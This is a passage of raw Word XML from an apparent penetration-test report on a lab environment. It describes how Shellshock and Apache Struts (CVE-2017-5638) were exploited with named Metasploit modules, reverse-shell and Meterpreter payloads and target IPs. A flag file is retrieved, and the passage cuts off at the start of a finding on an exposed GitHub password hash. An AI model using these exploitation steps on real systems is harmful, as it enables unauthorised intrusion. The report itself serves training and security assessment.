        <w:t xml:space="preserve"> and searched for Shellshock exploits. We selected the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/http/apache_mod_cgi_bash_env_exec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module and set the target URI to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cgi-bin/shockme.cgi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the RHOST to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.13.11</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After configuring the payload options with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload cmd/unix/reverse</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I ran the exploit using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. This process allowed me to leverage the Shellshock vulnerability and gain access to the specified remote host.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000165">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000166">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000167">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000169">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000172">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000173">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000174">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000175">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000176">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000177">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000178">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000179">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 10: Struts - CVE-2017-5638</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Based on a Nessus scan indicating that the host is vulnerable to Apache Struts, SIKYU TECH launched </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and searched for Struts exploits. We selected the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/http/struts2_content_type_ognl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit to obtain a Meterpreter shell. After setting the RHOSTS to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.13.12</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, SIKYU TECH executed the exploit. Once the exploit succeeded, We manually connected to the Meterpreter session using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -i &lt;session number&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. With Meterpreter access, We downloaded the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/flagisinThisfile.7z</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to our Kali machine. Finally, We unzipped the file on my Kali machine using the command “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7z x flagisinThisfile.7z” to get what we’re looking for.</w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000189">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000190">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000191">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000192">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000193">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pP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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000195">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000199">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 11: Exposed Password Hash in GitHub Rekall Site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By searching GitHub, SIKYU TECH found the totalrekall GitHub page. Navigating through the repository led me to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xampp.users</w:t>
      </w:r>
